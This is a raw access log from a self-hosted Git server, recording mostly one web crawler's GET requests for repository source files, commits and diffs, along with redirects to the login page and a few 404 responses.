"/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11299] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" [Client 216.73.216.188] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.html" [Client 216.73.216.188] [Length 21806] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11520] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/README.md" [Client 216.73.216.188] [Length 11341] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets" [Client 216.73.216.188] [Length 10358] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 11880] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" [Client 216.73.216.188] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12783] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11646] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 11958] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html?display=rendered" [Client 216.73.216.188] [Length 14240] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:24:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11494] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Finclude%2Fsite" [Client 216.73.216.188] [Length 29204] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:14:35 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 199.45.155.70] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[15/Feb/2026:13:16:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 10181] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/import_csv.py" [Client 216.73.216.188] [Length 14275] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 13508] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13137] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/script.js" [Client 216.73.216.188] [Length 10655] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py?display=rendered" [Client 216.73.216.188] [Length 10968] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 16153] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/js/script.js" [Client 216.73.216.188] [Length 3151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 10176] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?display=source" [Client 216.73.216.188] [Length 11098] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json?display=source" [Client 216.73.216.188] [Length 11686] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static" [Client 216.73.216.188] [Length 10663] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py?display=source" [Client 216.73.216.188] [Length 13655] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?display=source" [Client 216.73.216.188] [Length 15143] [Gzip 4.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 216.73.216.188] [Length 14804] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css/style.css?display=rendered" [Client 216.73.216.188] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.diff" [Client 216.73.216.188] [Length 1320643] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13139] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch" [Client 216.73.216.188] [Length 4652900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/ChatBot.tsx" -[15/Feb/2026:13:16:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/data/nginx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/nginx" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15540] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9978] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/ChatBot.tsx" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py?display=rendered" [Client 216.73.216.188] [Length 10976] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Header.tsx" [Client 216.73.216.188] [Length 14808] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py?display=source" [Client 216.73.216.188] [Length 13389] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" [Client 216.73.216.188] [Length 10080] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 10205] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 18163] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15543] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 10176] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css" [Client 216.73.216.188] [Length 12665] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css/style.css?display=source" [Client 216.73.216.188] [Length 31619] [Gzip 9.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 22029] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/database.py?display=source" [Client 216.73.216.188] [Length 12343] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/js/script.js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 20089] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/js/script.js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/js/script.js" -[15/Feb/2026:13:16:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr 